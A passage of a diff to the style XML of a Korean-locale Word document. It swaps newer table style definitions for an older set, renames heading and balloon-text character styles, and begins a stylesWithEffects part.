-    <w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
+    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
+    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
+    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
+    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
+    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="a">
     <w:name w:val="Normal"/>
@@ -4862,7 +4636,7 @@
     <w:name w:val="heading 1"/>
     <w:basedOn w:val="a"/>
     <w:next w:val="a"/>
-    <w:link w:val="10"/>
+    <w:link w:val="1Char"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:rsid w:val="00431F07"/>
@@ -4880,7 +4654,7 @@
     <w:name w:val="heading 2"/>
     <w:basedOn w:val="a"/>
     <w:next w:val="a"/>
-    <w:link w:val="20"/>
+    <w:link w:val="2Char"/>
     <w:uiPriority w:val="9"/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
@@ -4897,7 +4671,7 @@
     <w:name w:val="heading 3"/>
     <w:basedOn w:val="a"/>
     <w:next w:val="a"/>
-    <w:link w:val="30"/>
+    <w:link w:val="3Char"/>
     <w:uiPriority w:val="9"/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
@@ -4915,7 +4689,7 @@
     <w:name w:val="heading 4"/>
     <w:basedOn w:val="a"/>
     <w:next w:val="a"/>
-    <w:link w:val="40"/>
+    <w:link w:val="4Char"/>
     <w:uiPriority w:val="9"/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
@@ -4957,8 +4731,8 @@
     <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="10">
-    <w:name w:val="제목 1 문자"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="1Char">
+    <w:name w:val="제목 1 Char"/>
     <w:basedOn w:val="a0"/>
     <w:link w:val="1"/>
     <w:uiPriority w:val="9"/>
@@ -4969,8 +4743,8 @@
       <w:szCs w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="20">
-    <w:name w:val="제목 2 문자"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="2Char">
+    <w:name w:val="제목 2 Char"/>
     <w:basedOn w:val="a0"/>
     <w:link w:val="2"/>
     <w:uiPriority w:val="9"/>
@@ -4979,8 +4753,8 @@
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="30">
-    <w:name w:val="제목 3 문자"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="3Char">
+    <w:name w:val="제목 3 Char"/>
     <w:basedOn w:val="a0"/>
     <w:link w:val="3"/>
     <w:uiPriority w:val="9"/>
@@ -4989,8 +4763,8 @@
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="40">
-    <w:name w:val="제목 4 문자"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="4Char">
+    <w:name w:val="제목 4 Char"/>
     <w:basedOn w:val="a0"/>
     <w:link w:val="4"/>
     <w:uiPriority w:val="9"/>
@@ -5009,7 +4783,6 @@
       <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
     </w:pPr>
     <w:tblPr>
-      <w:tblInd w:w="0" w:type="dxa"/>
       <w:tblBorders>
         <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
         <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
@@ -5018,12 +4791,6 @@
         <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
         <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
       </w:tblBorders>
-      <w:tblCellMar>
-        <w:top w:w="0" w:type="dxa"/>
-        <w:left w:w="108" w:type="dxa"/>
-        <w:bottom w:w="0" w:type="dxa"/>
-        <w:right w:w="108" w:type="dxa"/>
-      </w:tblCellMar>
     </w:tblPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="a4">
@@ -5039,7 +4806,7 @@
   <w:style w:type="paragraph" w:styleId="a5">
     <w:name w:val="Balloon Text"/>
     <w:basedOn w:val="a"/>
-    <w:link w:val="a6"/>
+    <w:link w:val="Char"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -5053,8 +4820,379 @@
       <w:szCs w:val="18"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="a6">
-    <w:name w:val="풍선 도움말 텍스트 문자"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
+    <w:name w:val="풍선 도움말 텍스트 Char"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="a5"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="009A2F22"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+</w:styles>
+</file>
+
+<file path=word/stylesWithEffects.xml><?xml version="1.0" encoding="utf-8"?>
+<w:styles xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
+  <w:docDefaults>
+    <w:rPrDefault>
+      <w:rPr>
+        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+        <w:kern w:val="2"/>
+        <w:szCs w:val="22"/>
+        <w:lang w:val="en-US" w:eastAsia="ko-KR" w:bidi="ar-SA"/>
+      </w:rPr>
+    </w:rPrDefault>
+    <w:pPrDefault>
+      <w:pPr>
+        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:pPrDefault>
+  </w:docDefaults>
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
+    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
